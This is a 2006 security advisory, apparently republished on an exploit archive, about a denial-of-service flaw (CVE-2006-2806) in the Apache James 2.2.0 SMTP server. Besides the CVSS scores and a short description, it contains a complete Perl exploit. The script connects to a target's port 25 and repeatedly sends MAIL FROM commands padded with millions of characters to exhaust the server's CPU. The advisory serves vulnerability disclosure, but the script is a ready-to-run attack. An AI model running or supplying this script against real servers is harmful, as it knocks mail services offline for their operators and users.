JAMES 2.2.0 <-- Denial Of Service

2006.06.06
Credit: y3dips echo or id
Risk: Medium
Local: Yes
Remote: Yes
CVE: CVE-2006-2806
CWE: CWE-Other


CVSS Base Score: 7.8/10
Impact Subscore: 6.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Complete

------------------------------------------------------------------------ --- [ECHO_ADV_31$2006] JAMES 2.2.0 <-- Denial Of Service ------------------------------------------------------------------------ --- Author : y3dips a.k.a Ahmad Muammar W.K Date : April, 27th 2006 Location : Indonesia, Jakarta Web : http://advisories.echo.or.id/adv/adv31-y3dips-2006.txt ------------------------------------------------------------------------ --- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : Java Apache Mail Enterprise Server (a.k.a. Apache James) version : 2.2.0 URL : http://jakarta.apache.org/avalon/phoenix Description : The Java Apache Mail Enterprise Server (a.k.a. Apache James) is a 100% pure Java SMTP and POP3 Mail server and NNTP News server. James also designed to be a complete and portable enterprise mail engine solution based on currently available open protocols. James is based upon the Apache Avalon application framework. (For more information about Avalon, please go to http://avalon.apache.org/) James requires Java 2 (either JRE 1.3 or 1.4 as of 2.0a3). ------------------------------------------------------------------------ ---- Vulnerability: ~~~~~~~~~~~~~~ James SMTP servers are allowing attacker to supply a long variable at SMTP argument (such as MAIL) to the SMTP server, because of this vulnerability the Processor at server machine will have a workload till 100% Exploit Code: ~~~~~~~~~~~~~ -------------------------- james.pl----------------------------------------- #!/usr/bin/perl -w use IO::Socket; print "* DOS buat JAMES ver.2.2.0 by y3dips *n"; if(@ARGV == 1) { my $host = $ARGV[0]; my $i = 1; $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>"25", Reuse=>1) or die " Cannot Connect to Server !"; while ( $i++ ) { print $socket "MAIL FROM:" . "fvclz" x 1000000 . "rn" and print " -- sucking CPU resources at $host .....n"; sleep(1); } close $socket; } else { print " Usage: $0 [target] rnn"; } ------------------------------------------------------------------------ --- Shoutz: ~~~~~~~ ~ the_day, moby, comex, z3robyte, K-158, c-a-s-e, S`to, lirva32, anonymous ~ newbie_hacker (at) yahoogroups (dot) com [email concealed] ~ #e-c-h-o @irc.dal.net ------------------------------------------------------------------------ --- Contact: ~~~~~~~~ Ahmad Muammar W.K || echo|staff || y3dips[at]echo[dot]or[dot]id Homepage: http://y3dips.echo.or.id/ Blogs : http://y3d1ps.blogspot.com/ -------------------------------- [ EOF ] ----------------------------------


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top